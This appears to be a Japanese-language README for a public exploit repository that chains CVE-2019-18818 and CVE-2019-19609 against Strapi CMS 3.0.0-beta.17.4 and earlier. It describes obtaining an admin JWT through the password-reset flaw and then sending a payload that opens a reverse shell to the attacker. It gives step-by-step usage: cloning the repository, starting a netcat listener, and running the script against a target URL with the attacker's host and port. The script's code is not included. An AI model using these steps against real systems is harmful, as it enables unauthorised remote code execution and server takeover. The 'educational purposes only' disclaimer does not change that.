
Strapi CMSにおける認証されていないリモートコード実行のための、CVE-2019-18818とCVE-2019-19609を組み合わせたエクスプロイトスクリプト。
CVE-2019-18818 と CVE-2019-19609 を組み合わせたエクスプロイトスクリプトです。Strapi CMS において認証なしでリモートコード実行を実現します。
このスクリプトは、Strapi CMS バージョン 3.0.0-beta.17.4 以前の脆弱性を悪用し、認証なしでのリモートコード実行を可能にします。
このエクスプロイトは、まずパスワードリセットの脆弱性を利用して管理ユーザーの JSON Web Token (JWT) を取得します。次に、そのトークンを使って Strapi CMS に悪意のあるペイロードを送信し、攻撃者のマシンへのリバースシェルを起動します。
リポジトリをクローンする:
git clone https://github.com/Hackhoven/Strapi-RCE.git
ディレクトリに移動する
cd Strapi-RCE/
Netcat リスナーをセットアップする
nc -nlvp <LPORT>
ターゲット URL、ローカルホストの IP アドレス、ローカルホストのポートを引数としてスクリプトを実行する
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
このスクリプトは教育目的のみを意図しています。作者は、本スクリプトの違法または非倫理的な活動への使用を容認または支持しません。このスクリプトは、合法的なセキュリティ調査または CTF 環境でのみ使用されるべきです。自己責任で使用してください。
作成者: Hackhoven